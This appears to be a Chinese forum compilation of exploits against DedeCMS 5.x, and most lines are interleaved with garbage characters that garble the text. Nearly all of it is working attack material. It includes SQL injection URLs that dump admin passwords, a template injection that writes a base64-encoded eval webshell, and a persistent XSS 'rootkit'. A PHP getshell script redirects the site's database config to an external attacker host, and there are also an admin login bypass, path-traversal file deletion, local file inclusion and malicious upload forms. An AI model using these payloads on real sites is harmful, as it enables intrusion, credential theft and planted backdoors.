|
|
, z% \$ m2 t( H1 T$ ?Dedecms 5.6 rss注入漏洞
}( z( j8 R6 o" v! v) c% I/ Y9 u/ Xhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
$ q/ l+ m# Z4 t; \4 Q3 S' Y9 @( V1 S `: U/ g" z4 s x
3 U! M* G% B$ R' V* z# [% o
1 D! W. [! b$ F' n5 K0 ^! N" D9 R4 J5 x- j
, d# X# y$ l1 N) z/ Q2 _. f" w$ ?+ B. t2 e1 e
5 t1 R- f7 a# M- x
% B" V8 [# d5 t7 `DedeCms v5.6 嵌入恶意代码执行漏洞
3 Z: G7 m' h5 P2 I4 i! |注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
% i7 [8 P) U1 E+ O! ^, @+ V发表后查看或修改即可执行
2 g7 E! [* D+ w8 }a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
, V S5 |7 |/ S0 ~) v生成x.php 密码xiao,直接生成一句话。
" d) ? a, e/ u6 u" k; `' p8 b, ^, P6 E5 o. L, Q4 @3 W- a* J
0 a2 Q' Z% a' H8 t+ [) r
" i4 A1 b0 L" c" g& O0 D z+ T m+ K8 `" J
& d8 S. e. I4 P6 O2 {
1 z. U& m& b6 V, t4 z
" w ]& L0 n$ o
5 h+ K, ], X5 J) z. qDede 5.6 GBK SQL注入漏洞3 `6 w' t; q! ~
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';0 {. @- S- b- [9 _% w% F& Z4 h6 n2 U
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe8 p7 q. W( j/ C3 c. o8 h
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7. ]; y. d- z7 ^( p1 l
! u+ B' y. P- J- x& p. u3 e3 A b$ c& ?
1 r7 ^3 ~+ N" C6 `' Y# D7 U7 c
. a, r. k* t' K# C( Q0 P0 F; H) ~- P' p. G9 o
3 {1 p' T7 D) j9 p' [
' r0 E# t5 ]- J; F0 h
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞5 b9 `8 l8 P; s/ _
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
/ s! h6 m$ U; ~% E0 V* N. p5 E
J' D, W2 T7 C1 Q
* L7 c- x9 M! |1 ^; Z
! J: x* f. p7 {6 ~: P, {+ H0 g1 b1 P. J8 D T
2 R! L7 R# K# q4 M p6 I3 u
DEDECMS 全版本 gotopage变量XSS漏洞
, Z) U7 @' \( L( B* W* _# i- r& _& D1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ) p' ]# y4 k2 o8 v7 t
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
8 d8 L! n7 o5 y' f, B' l3 r' ~7 O/ f, [3 |
s7 ? ^9 f( R: r
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
! |2 K9 B7 _0 ]6 i# ]http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda. z4 @1 M x# a& Y" W, v. }
5 m' X$ Y0 J0 u1 L7 f) y
# B2 f9 l6 u( [$ \4 j1 s: j6 n nhttp://v57.demo.dedecms.com/dede/login.php
4 \9 J$ q8 P8 k$ y+ t* v3 ~2 Z* T. u0 v" ]/ J+ Z5 @
) Y0 Y9 W7 j+ Q0 p0 k* J+ \$ Ccolor=Red]DeDeCMS(织梦)变量覆盖getshell
6 k' h6 h; a+ c/ r/ B6 O( ~9 x#!usr/bin/php -w2 ^' N2 o8 T9 N
<?php
) q- {4 T7 h1 K, Xerror_reporting(E_ERROR);: \- G+ O+ D3 `/ M( v
set_time_limit(0);! J, |7 N$ S$ w2 u1 Y) r+ @" \
print_r('
+ V; u; |/ p u, ZDEDEcms Variable Coverage
7 x) k4 t: @! w! N9 H3 y' IExploit Author: www.heixiaozi.comwww.webvul.com& O7 w8 }. a5 d* t
);
0 T" S0 F) U6 \* s5 xecho "\r\n";& G7 o3 y1 K: y' z0 q
if($argv[2]==null){) U5 d, N, g2 N) M4 f
print_r('
3 H7 S2 X( m+ i, X6 Z0 d+---------------------------------------------------------------------------+
9 V& l8 P( c/ XUsage: php '.$argv[0].' url aid path. Q1 c1 f1 d4 A% w
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/! E5 o: { ^# Z+ n( M
Example:
" V, ~- [' Q. E' I. K( T- B4 Sphp '.$argv[0].' www.site.com 1 old" |- {( s6 D8 X/ A
+---------------------------------------------------------------------------+
" V' ~& Y* Y. {* C');% E% d. ]& f% M$ F4 D s
exit;
$ c$ Q7 o! R7 Q, U3 r- z) K}
7 K$ i" c5 `# B8 t3 a; m$url=$argv[1]; o8 x+ [% \. A) |: A6 T6 a
$aid=$argv[2];( y) I5 b" \ j6 K, g1 ?
$path=$argv[3];
" s! n& q% i7 m( I8 d K/ g3 [, ]5 N' G$exp=Getshell($url,$aid,$path);3 X( A. U. F. H; P) t
if (strpos($exp,"OK")>12){
7 p4 i: P/ z7 _2 Q: E& ?0 r/ Wecho "
- X" B7 Q p! M8 f9 [' mExploit Success \n";
( S8 }( g3 m4 Y9 O2 }$ `, J0 Pif($aid==1)echo "
2 s4 ~4 U, t9 W O/ |0 a) ^Shell:".$url."/$path/data/cache/fuck.php\n" ;
1 E3 R8 Q. G4 H5 l
" S) B; I0 {* D0 s
* G/ k; s3 h- a! zif($aid==2)echo "
- Z& e% L: M z7 S0 _" @Shell:".$url."/$path/fuck.php\n" ;
" p" k6 K( }& c# U: _7 l' |! e3 _' G- W+ j/ F0 H' ^" c
) K) H! w% t( A* d( T p+ t
if($aid==3)echo "
4 [* `" d' s3 C. i3 YShell:".$url."/$path/plus/fuck.php\n";
7 \0 I8 p- i4 K
1 ~6 ^8 s- G/ `# K6 N; W" G2 J2 Q9 X8 g5 F2 {; r, ] f
}else{9 @1 a" f: P' {+ ~
echo "7 g, w9 `$ D1 N, K
Exploit Failed \n";9 h9 H" T1 `( X) L. ?
}9 }! [, ^( N2 Q' M5 n+ w# F; p
function Getshell($url,$aid,$path){9 e5 b- Y8 y% l* j+ u N
$id=$aid;% q8 w$ n N) L3 v
$host=$url;
; K/ ^8 _+ J+ R6 r$port="80";
/ W6 Q l: w. h' }% k( e1 I! p5 s! [' u$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";3 c! q1 V4 I2 O1 E( C& g; F
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";* u' m5 }: V4 t& H: _+ e9 M
$data .= "Host: ".$host."\r\n";2 W4 [& F3 Q# \7 B
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
( H" f' N4 r1 @$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";0 e3 s3 l0 m1 Q9 Y6 ?) M5 S, Z
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
+ I! _+ P) H/ M: z$ @3 p//$data .= "Accept-Encoding: gzip,deflate\r\n";
c' ?, G3 \1 N' s+ J# P$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";, P5 d( `5 m+ B2 I i3 D
$data .= "Connection: keep-alive\r\n";: V: g# Q$ _9 J# z: h6 R( n2 w
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";( J3 m6 M% i% c: \/ o0 I) R: e
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
! I$ k( s- `4 Z/ ?5 u: X$data .= $content."\r\n";5 [" k! u( U6 N* D9 z' E& R
$ock=fsockopen($host,$port);
3 {6 @2 I5 X; Z4 }- p: |8 lif (!$ock) {
( `. Q' `. d8 T6 Vecho "
7 P# E$ ~2 ^. J3 q6 [No response from ".$host."\n";
+ b( S: P5 v6 Z" \}4 J; u" ^0 d7 w! V
fwrite($ock,$data);
0 w$ ~4 K v Wwhile (!feof($ock)) {
0 z6 o+ n8 }, [6 D) G/ B$exp=fgets($ock, 1024);
& \: E; P! _- G' ]* q$ S" Preturn $exp;
; I: v+ \) w; _7 a5 x' B/ _}9 B5 X2 t$ O' {, h, U+ b
}) ~1 p9 ^5 P+ R9 o- r
# T: Y; w1 j3 |0 s5 Y9 M) W! C# j& n" \% B, ]
?>" Q9 m& h* ~( l
j. B) F9 A. a
0 W# ?$ Q% B3 N7 a& q& ~9 m/ |9 [! e. F+ W ^5 i% q* l) s
" s4 c, M: S( l/ v+ ?& ]: X' {
/ G6 h$ f$ K/ @! m
8 \4 y) H: `. l
+ O2 j2 D/ E) _' @+ }% v. l, o
8 u I6 y( n2 P7 | v: D# d7 E' E5 R
3 z" D( p u7 N; `- ]
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
, u+ ~( m; n4 y6 q* X7 n; t5 [http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root- D0 ^, ~3 N$ p7 w& }
) i7 o" g( T7 h# H" ^: r. }5 G
" H' s! Z1 Q8 A5 t7 p% Q4 m把上面validate=dcug改为当前的验证码,即可直接进入网站后台0 L Y) X m- z# t
/ x; z; O( s9 P G5 T6 m
8 M' K4 A; H3 A+ V
此漏洞的前提是必须得到后台路径才能实现/ ~1 L: b- X& P5 H1 a& c, B0 `
2 z5 G0 W W/ g2 ?; t
9 m# I; O; g- D X' H7 L* Y# d# q8 q' A0 z. v
2 q2 N& A8 m5 z. q
4 J, Y, B, E% o e: L: i8 y
2 d3 y. \" S/ T( f4 ^4 `
+ }- P# h. `* ~5 Z M
l/ y6 p7 a, c( [( {/ I1 @1 x/ ?. X6 R" c9 D! J
! N2 w9 }' ?* C$ o/ j! }: i9 GDedecms织梦 标签远程文件写入漏洞
; f% S5 m8 j9 _, ?0 a, a前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
! T8 S' {3 X C3 x) A8 g, ~2 g8 H' M3 _7 H
) `- ?" |7 O, i6 _3 t再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 / u" ~! e9 D: l. I
<form action="" method="post" name="QuickSearch" id="QuickSearch">
! I- f" r: i1 a$ f0 K m/ \<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />1 G6 }, H. R, J: Q+ u3 p
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />) F. `; ? {' ~8 B
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />' c k* ?' Z* }4 B. H, t' i
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
" p, Y9 V) y7 Y6 M<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
2 {6 r# @5 I6 Z( L<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
) X0 R) V' I# s9 P8 K<input type="text" value="true" name="nocache" style="width:400">: _9 I) c4 @0 X' C' M7 K
<input type="submit" value="提交" name="QuickSearchBtn"><br />
8 ^8 u1 J3 I' L- l. H</form>% v7 _- h- H: N2 l+ r5 r- o7 O
<script>: m4 {. n7 e! M$ v, E% k
function addaction()/ C; C" n6 ^; s: U1 t' K
{
# z1 _4 U$ X0 j; E/ n m% G" Edocument.QuickSearch.action=document.QuickSearch.doaction.value;
/ M+ _# I* o1 U6 \}
3 v' ]* R! q; L% H% f- }" Z</script>. _2 j9 Y5 a6 I9 d @& x6 [" i# n- [) B
% w7 I! }" ?2 b3 E! g5 }2 t4 H9 C) I
" X7 T5 ]: W, c7 W% u7 o
# b V/ R7 `# t
& T$ D( |& O+ |! J
: R! v$ s: K9 ?7 y( f7 Q2 L. f3 d9 J0 b. x4 \
8 k8 J5 w9 r1 {0 b4 u* ~* q& b) z( c5 J6 y7 n6 f% d" V* q$ Y
6 t- d; J9 X, K& Z. nDedeCms v5.6 嵌入恶意代码执行漏洞
/ J! g* }5 H% F注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行* r% t1 l( P7 s2 B5 S
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}. ~6 ^' X' u+ O" }7 ^ E
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
1 [! y; z! v a7 U2 t, LDedecms <= V5.6 Final模板执行漏洞, N6 o; F$ t+ \$ P$ A2 e2 _
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
. r! u2 R9 U! u# B, J: G; Suploads/userup/2/12OMX04-15A.jpg
* g4 X5 P$ Y* t0 k# K
: m2 t) e4 a, e/ n' m$ b d+ Z j0 G
模板内容是(如果限制图片格式,加gif89a):
. C+ c7 I) U3 V9 ~6 A) x* V+ G{dede:name runphp='yes'}7 G; ?, }$ r8 V( Z/ L7 R% N! @
$fp = @fopen("1.php", 'a');
3 q: w$ C' ~. W! O7 W. Q4 S' B- s@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");1 ]- c6 T+ J! L6 y5 V$ K9 n
@fclose($fp);) J4 O- N8 g7 h. q/ a. ~- y8 f" C8 F) c4 ?
{/dede:name}
# k& f8 W2 Y( ?2 修改刚刚发表的文章,查看源文件,构造一个表单:
4 N% g6 [% {$ B& ?+ E8 I0 k- Y, @<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
7 A9 _( V/ k& L5 |* Q<input type="hidden" name="dopost" value="save" />6 v) O+ g" |! r( T- S) X5 y. V
<input type="hidden" name="aid" value="2" />) l$ R6 |$ j! `/ a: q
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
P6 }3 X- H% ~! `<input type="hidden" name="channelid" value="1" />
5 o5 O: b' u T+ ^- h6 D' c, y<input type="hidden" name="oldlitpic" value="" />5 S8 q. R- k. |, b2 s( e& i, s: _) O6 u K
<input type="hidden" name="sortrank" value="1275972263" />$ Q4 h1 L( P& a, h+ e" T. t9 [7 D, y
" R% l/ |/ H, H. S4 a
0 C8 E- `- H/ K<div id="mainCp">" R1 E! P3 H+ S5 B7 z6 F" I( E
<h3 class="meTitle"><strong>修改文章</strong></h3>4 f$ n9 L4 ]$ n2 }$ U, {& w
, @% \6 l4 `$ j( \
9 I' p/ E, a- P9 P& v( ~; |* S
<div class="postForm">
, Y# m" Y- S7 [<label>标题:</label>
- h# c5 ?7 k/ e6 ^2 l/ A<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>8 X2 H* m8 o/ K @8 ]+ R* B1 O$ ?
& T% h W O$ o. `- a: \
6 T5 H- {% U M' Q* B& `
<label>标签TAG:</label>
$ V' T% t) Q* p9 r7 t<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
( N: x% `/ _$ T: _: s3 N9 q( [2 _* M& x+ B, g1 K- f4 Y: R, Y
9 V8 f- X& @5 c* F" i0 ~
<label>作者:</label>! l" Q3 M" K, }+ g' M1 J
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
7 `$ \% J5 `! s: D, ^; Q
, j) `- P' e0 |( [% e% R& e: l3 j8 t
9 c" S1 y2 ?! y5 k" `4 U7 |: `% B<label>隶属栏目:</label>' q3 x4 }" |. [9 v8 L, X1 L, C2 i, e
<select name='typeid' size='1'>
; a7 o3 \% U. k5 V9 r0 T- Q<option value='1' class='option3' selected=''>测试栏目</option># ~8 h5 [: d; c5 V$ f! C" ~
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
4 [) O; o( f6 |" H1 ~# k! A; `$ s
9 l9 A# }6 }* H0 J
8 N+ w, b, K' T, f+ T( Q( q<label>我的分类:</label>( C' W8 G- ]( ?4 r% z1 }/ Y
<select name='mtypesid' size='1'>
. M& T) T/ A3 Z. d# G- }6 ]9 C<option value='0' selected>请选择分类...</option>5 g2 G2 D* K% `3 \; O. m3 ~: g
<option value='1' class='option3' selected>hahahha</option>5 n0 G. e1 {$ y h
</select>1 ^" Z8 K5 i, ^4 l, R% B' Z
# K8 j4 I5 [6 Q$ L
7 x2 M& E7 H/ E<label>信息摘要:</label>
, w' j E# {# p1 n+ F0 s5 h$ b- i<textarea name="description" id="description">1111111</textarea>
8 ]7 g1 ]) I5 Z, J p! H% q(内容的简要说明)2 G7 F( p7 G1 _) n2 n
2 M, C+ `% x7 Y! _% E J# `3 L$ P D1 q
<label>缩略图:</label>
; H5 }- Q; T% [. o( i<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>1 \) `- e) B! y% b' V& P
, R8 n8 A& v7 I6 U2 F' i$ m
' X7 ^2 H" v( A4 d
<input type='text' name='templet'+ u# S# E8 h- ^, ?6 c/ ^4 c o
value="../ uploads/userup/2/12OMX04-15A.jpg">- `( o; |' g; d5 a- T" L2 x
<input type='text' name='dede_addonfields'
1 l4 Q3 _( `+ z; Q8 E. a6 [' Ovalue="templet,htmltext;">(这里构造)
, n( c3 h% `) ~6 Z' N7 p$ Z4 ]1 z</div>
4 U4 {3 J0 \7 k! v; d) b* n# b) j0 S! W# u1 u$ ~
& r6 F9 h* G. W2 S
<!-- 表单操作区域 -->, k' F" E5 O* b- |6 U [
<h3 class="meTitle">详细内容</h3>) N1 F9 w# f6 f. o& \
) W: i+ L" m. y7 T ~) C ^$ H) x
3 y2 I. b; t9 R8 |, u, k<div class="contentShow postForm">
3 p+ ?4 m# K5 ^3 f# m<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
, [2 H3 \/ i: w* g- w" W/ _9 f$ S6 m. D9 {& {
1 R3 C8 Z( U2 R4 M( v
<label>验证码:</label>! `2 a- C0 x( a: J
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />3 E3 f/ D% @5 q+ [) g
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />. z4 Y4 M; `" ?% W/ \! _
1 ]. A+ u# D! F
6 P: z; g% h) B' c# ]# z: T
<button class="button2" type="submit">提交</button>
2 B9 T& ?" {, H0 t! N3 O4 P<button class="button2 ml10" type="reset">重置</button>6 s9 ~$ x& m) ~
</div>2 q" j8 ~. d3 i }1 W/ C9 Y. k
, Z- D" K: b: F- M5 p1 F
, Y! |! u2 k( y9 l. r( {
</div>
* K+ p# E0 m$ h" i3 c" G7 @" _0 Y2 {, f" g+ i
, s7 b, ?" N1 w4 z+ b
</form>3 V4 W3 x1 Z8 G. w6 C* U- ~% ?' ~
" E" k4 W& q3 c' M: x2 Z+ ~9 t
* U/ N4 W9 p$ p' h( p
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:- f( A& `+ a' D7 T* u
假设刚刚修改的文章的aid为2,则我们只需要访问:) ? W" K: U7 _) w9 T# g( P; V) g8 Y# Q
http://127.0.0.1/dede/plus/view.php?aid=2, f6 a- f$ P( J& W" Q
即可以在plus目录下生成webshell:1.php
# z2 g3 F/ j6 L. m4 U
' ^/ z) S9 d' c @8 O. ^. Y k" F$ ]2 R' V$ G
/ C: w M) w& N. p& C
* ]5 v: {! G* z' c/ p1 C0 t
' m( G7 P6 V# i \+ r5 T/ w" Z! [, d7 L, q% m' U2 \6 x `
$ n: W7 O- M. Y& A" H5 `5 H* S; ]9 j# U
& |# m* n- b$ s7 U, J2 g- y$ L3 j
. p/ \$ }+ N% O: j
% ?1 V6 s* O8 | ^ f6 a! u+ i! g9 V- _0 P. e
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
4 k8 v8 a7 l* }: a2 \1 z z3 _1 |, qGif89a{dede:field name='toby57' runphp='yes'}
4 q' w" w4 ? V0 L1 o* ?2 b6 zphpinfo();' `5 w3 `, H; L4 L0 Y5 Y& H/ m$ Z
{/dede:field}
( \* C2 f5 {0 A0 o保存为1.gif3 \% U& L) X% l3 L
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 2 j& s) ~2 ~. X5 x8 ^9 V
<input type="hidden" name="aid" value="7" /> . d+ |5 e& I% v: T
<input type="hidden" name="mediatype" value="1" />
% a' c* Q/ t. o0 c<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
4 ]$ M* N& X+ y+ O( Q4 _<input type="hidden" name="dopost" value="save" />
; f; _) \4 {2 q' U# W<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
4 ~, ~/ W5 `8 P<input name="addonfile" type="file" id="addonfile"/> # c8 d. H" B! p* x r- H' G
<button class="button2" type="submit" >更改</button>
7 H4 Q; d, e7 B5 J2 ]# g3 J& N p</form> - S; |& ^0 G, S8 [% |
7 p) B3 S. i" H- k# t# x, C" N2 M( ]% U* g
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
& ^5 e* n. E/ \1 K% {7 r- v5 Y- Q发表文章,然后构造修改表单如下: k$ l4 M" X: ]' r# {0 D& A
2 Y! w( F4 h! \1 X$ R. o! [
/ P+ o/ a- b$ p4 M5 |<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
, D, o( T7 _) t1 \<input type="hidden" name="dopost" value="save" /> ) @/ `) g2 y/ C& L8 V4 L1 S/ K" X
<input type="hidden" name="aid" value="2" />
- k6 W+ \' L3 {( d<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
u( C- m7 k+ s<input type="hidden" name="channelid" value="1" />
6 _3 S4 G/ a# G) G<input type="hidden" name="oldlitpic" value="" /> ' y: }3 a" s U* c. ]' u0 G
<input type="hidden" name="sortrank" value="1282049150" />
' N( @/ s Q4 a1 L; r; n<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> % _5 `9 w! u2 `( J; N
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
. D+ m2 q3 d C+ `( g; p4 _. _<select name='typeid' size='1'>
% s/ d& h2 [ Q8 [0 d5 ^; ?9 U<option value='1' class='option3' selected=''>Test</option> 4 L, Z- ~8 E. k8 y' s8 r7 l& s2 _
<select name='mtypesid' size='1'> # E8 s8 \9 h/ g9 y7 C- F& w- e
<option value='0' selected>请选择分类...</option>
" l8 Y0 q0 g5 j4 j/ O2 V<option value='1' class='option3' selected>aa</option></select> / W! K, {$ z8 o3 K/ f9 {' @( D8 ~
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 5 M/ T3 C/ L+ p: {" Q
<input type='hidden' name='dede_addonfields' value="templet"> / ]( y+ c$ l/ [- ]2 O* [5 T
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> " m! q- F1 ^% D: m) i
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> . f$ R7 k# n5 u' o, w; q7 Y
<button class="button2" type="submit">提交</button>
( F7 b5 F N! O- O5 ?4 m( F& D3 u</form>
( K0 M. i6 o' L! G. w" T/ @& D6 ` m m
" U1 }. n, C8 |! L1 n; @8 @5 Q. s# T' ~7 D1 O6 `' A& `
* h! f; B- W1 |1 T9 A
9 z" f* J0 h8 _
7 N) G/ C( K' u L+ q
; d+ V. R7 c# r: k$ ]0 O9 z3 B$ Y% c+ Q
7 m4 Q! i3 A) h, L1 o
! ?6 D! W9 T* R9 w" Q4 n
. T8 {) ?6 C: z4 t' y+ S' W6 {/ O; h
1 s5 B8 X4 y; i4 [织梦(Dedecms)V5.6 远程文件删除漏洞
+ z- t+ u; [: d& y# Vhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
/ T3 m9 e2 g' U2 L' ?1 N& R1 L% A( y) g y4 |; k' c: V
* z7 R/ D# a, q. e( ?/ U# }: n# N
: S' X; | @1 I. P% I& u5 n. d0 T6 [
: Y6 [& b1 Z. y& ?) m3 n2 A8 R! m
* |. D" d9 H$ c, j! w5 q/ R
& l8 c* b5 r9 ]1 d$ p6 `: {5 z& K0 g3 s" R
& P; v" O3 @9 Z+ @1 R2 J8 m8 y: R' \* W! a7 z9 A% k! x
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 7 J9 j' k9 R% s) G6 H) N
http://www.test.com/plus/carbuya ... urn&code=../../0 Q1 u# v% [4 y* |* H
( w5 e# h9 H0 P* {
+ ^5 o# D7 R0 Z; s
" n' K0 i, o: I o( n% |
/ J. X9 w- O* ]6 E
1 U) U$ A4 G7 [. W7 Y( Z1 ?
; g1 w/ O( V' ` F4 w/ a- U
' \4 N- O: c( U4 Z% m( M
A; S" u1 T _7 @% s3 h/ m8 J3 C2 a( _4 B: m
0 G' u' z/ P: k+ }
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
/ R& O8 F+ b, Xplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
" K& F- y r1 e; P密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
! a1 m/ @2 J: J, g) @
. Q( j: f- g1 ?) q0 b
7 ~1 Y6 c8 z4 t3 l4 S$ { ^' U9 w: p' `! ^& n. r
2 Q# E1 i( D+ g3 _! a" P- Q+ Q' i1 F# M5 o- O+ y0 C( {7 c
& _+ f) E( ^; T' N
) H/ k/ t4 f6 o% @7 ^& S3 U4 L h( n2 ]; ~8 ~# g& p6 z9 ]7 |( f+ r
( s/ Z2 e- l. [1 ]+ }# X! y& w+ ?5 c: W5 z- |
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞! z( J5 W( l7 s- {
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
; A* K$ Q* ^2 ?; F/ @
( v. Q) t. J" h+ N* J
. c# `3 X9 ^) `) [6 X0 O$ Q
) {: G% v) n3 ~' j( _; p4 O }* d" N8 N6 {. o9 L# C7 U: f
' ^* v* A) C+ C0 `
8 Z, ~) S- ?6 `- g
